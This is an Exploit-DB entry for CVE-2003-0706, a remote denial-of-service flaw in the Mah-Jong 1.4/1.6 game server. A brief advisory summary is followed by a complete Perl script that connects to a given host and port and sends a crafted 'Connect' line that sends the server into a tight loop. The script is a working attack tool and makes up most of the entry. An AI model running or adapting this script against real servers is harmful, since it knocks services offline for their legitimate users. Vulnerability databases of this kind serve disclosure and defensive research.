Mah-Jong 1.4/1.6 - Server Remote Denial of Service

EDB-ID:

23116

CVE:

2003-0706

EDB Verified:

Author:

jsk

Type:

dos

Exploit:   /  

Platform:

Linux

Date:

2003-09-07

Vulnerable App: 
source: https://www.securityfocus.com/bid/8558/info

A remote denial of service vulnerability has been reported to affect the mah-jong game server. The issue has been reported to be exploitable so that a remote attacker may trigger a tight loop in the affected mah-jong server. This will cause the game server to be unresponsive to further commands, effectively denying service to legitimate users. 

#!/usr/bin/perl -s
use IO::Socket;
# test it in slackware 9.0
# DOS-test--mj1.6--code by jsk
# mahJong 1.6, all versions of mahjong
if(!$ARGV[0] || !$ARGV[1])
 { print "usage: ./dosmj.pl <host> <port>\n"; exit(-1); }

$host = $ARGV[0];
$port = $ARGV[1];
$jsk ="Connect 1034 0";
$socket = new IO::Socket::INET (
 Proto => "tcp",
 PeerAddr => $host,
 PeerPort => $port);

die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "Connect 1034 0";
print $socket "\r\n";
close($socket);
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services